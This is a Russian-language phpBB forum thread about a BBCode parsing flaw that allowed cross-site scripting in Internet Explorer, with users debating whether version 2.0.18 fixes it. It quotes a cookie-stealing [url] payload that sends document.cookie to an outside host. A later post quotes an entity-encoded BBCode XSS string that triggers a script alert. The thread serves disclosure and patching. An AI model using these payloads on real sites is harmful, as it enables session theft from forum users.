crash, некорректно этот косяк называть только косяком IE. вообще-то это косяк был возможен благодаря некорректному парсингу bbcode.
bas этот косяк залатан давным давно...
[url]http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]тест[/url]
Взломали 2.0.18
-
- Former team member
- Сообщения: 582
- Стаж: 20 лет 3 месяца
- Откуда: Москва
выделенный сервер по цене обычного хостинга - менее 150 рублей в месяц
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
-
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 20 лет 2 месяца
crash
Вообще то, владельцам форумов от этого не легче!:-) И в данном случае - это дырка форума. Надеюсь, что в 2.0.18 её нет! Хотя и в ней скоро что нибудь "найдут".
Мне припоминается, что приходили письма, с вложенными архивами. Они были возвращаемые ( адрес не найден), но я то их не писал. В них была "абрака-дабра" и я их удалял...Видимо это были ошибочные попытки взлома.
Добавлено спустя 13 минут 42 секунды:
Вообще то, владельцам форумов от этого не легче!:-) И в данном случае - это дырка форума. Надеюсь, что в 2.0.18 её нет! Хотя и в ней скоро что нибудь "найдут".
Мне припоминается, что приходили письма, с вложенными архивами. Они были возвращаемые ( адрес не найден), но я то их не писал. В них была "абрака-дабра" и я их удалял...Видимо это были ошибочные попытки взлома.
Добавлено спустя 13 минут 42 секунды:
Да я вроде обновлял, но сказали, что обновил только базы...Объясните нерадивому, как правильно обновлять?этот косяк залатан давным давно...
-
- phpBB 2.0.0
- Сообщения: 211
- Стаж: 19 лет 5 месяцев
- Откуда: Новосибирск
bas
http://www.phpbbguru.net/community/topic5361.html
http://phpbbguru.net/mods/?id=116#116 Скачать: phpbb_2.0.17_to_2.0.18.zip
http://www.phpbbguru.net/community/topic5361.html
http://phpbbguru.net/mods/?id=116#116 Скачать: phpbb_2.0.17_to_2.0.18.zip
-
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 20 лет 2 месяца
-
- phpBB 2.0.0
- Сообщения: 227
- Стаж: 19 лет 9 месяцев
Залатан да не совсем. Вот код алерта:
Если немного подредактировать, то в ослике Ие работает.
Надо с этим что-то делать, млин.
Код: Выделить всё
[url]http://www.[url=http://bla-bla.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]bla-bla[/url][/url]
Надо с этим что-то делать, млин.
-
- Former team member
- Сообщения: 582
- Стаж: 20 лет 3 месяца
- Откуда: Москва
Совсем залатан. Давно уже.Gosudar писал(а):Залатан да не совсем. Надо с этим что-то делать
http://phpbbguru.net/community/post33647.html#33647
выделенный сервер по цене обычного хостинга - менее 150 рублей в месяц
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
-
- phpBB 2.0.0
- Сообщения: 227
- Стаж: 19 лет 9 месяцев